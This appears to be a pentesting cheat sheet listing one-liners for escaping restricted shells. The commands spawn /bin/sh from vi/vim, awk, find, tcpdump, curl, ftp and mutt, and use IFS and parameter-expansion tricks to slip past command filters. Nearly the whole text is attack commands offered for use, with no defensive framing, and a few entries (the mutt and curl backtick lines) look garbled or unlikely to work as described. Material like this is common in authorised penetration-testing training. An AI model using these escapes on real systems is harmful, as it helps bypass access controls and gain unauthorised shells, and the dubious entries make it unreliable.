Skip to content

Break Out Of Jail / Shell Escaping Techniques

  • Discover powerful shell escaping techniques to break out of restricted environments.
  • Learn how to execute commands inside vi/vim, leverage awk, find, tcpdump, curl, ftp, mutt, and clever bash commands to escape jails and gain control.

Executing Commands Inside vi/vim

vi
:set shell=/bin/sh
:shell

Command Execution

:! /bin/bash

awk

awk 'BEGIN {system("/bin/sh")}'

find

find / -name 0xffsec -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;

tcpdump

tcpdump -n -G 1 -z /usr/bin/php -U -A udp port 8080

curl

curl -T@`/bin/sh` localhost

curl

> nc -lvvp 1337
curl -T"/bin/sh" http://127.0.0.1:1337

Escape to a real shell via ftp (bang-command)

> ftp !/bin/sh

Spawn a shell via mutt (shell escape)

> mutt sh

IFS-based command injection to run sh

ls${IFS};sh${IFS}

List root folder in bash

l${u}s ${PATH:0:1}

List /usr folder in bash

l${u}s ${PATH:0:4}

Print $PATH

echo ${PATH:0}

Print /us with rev

echo ${PATH:2:3}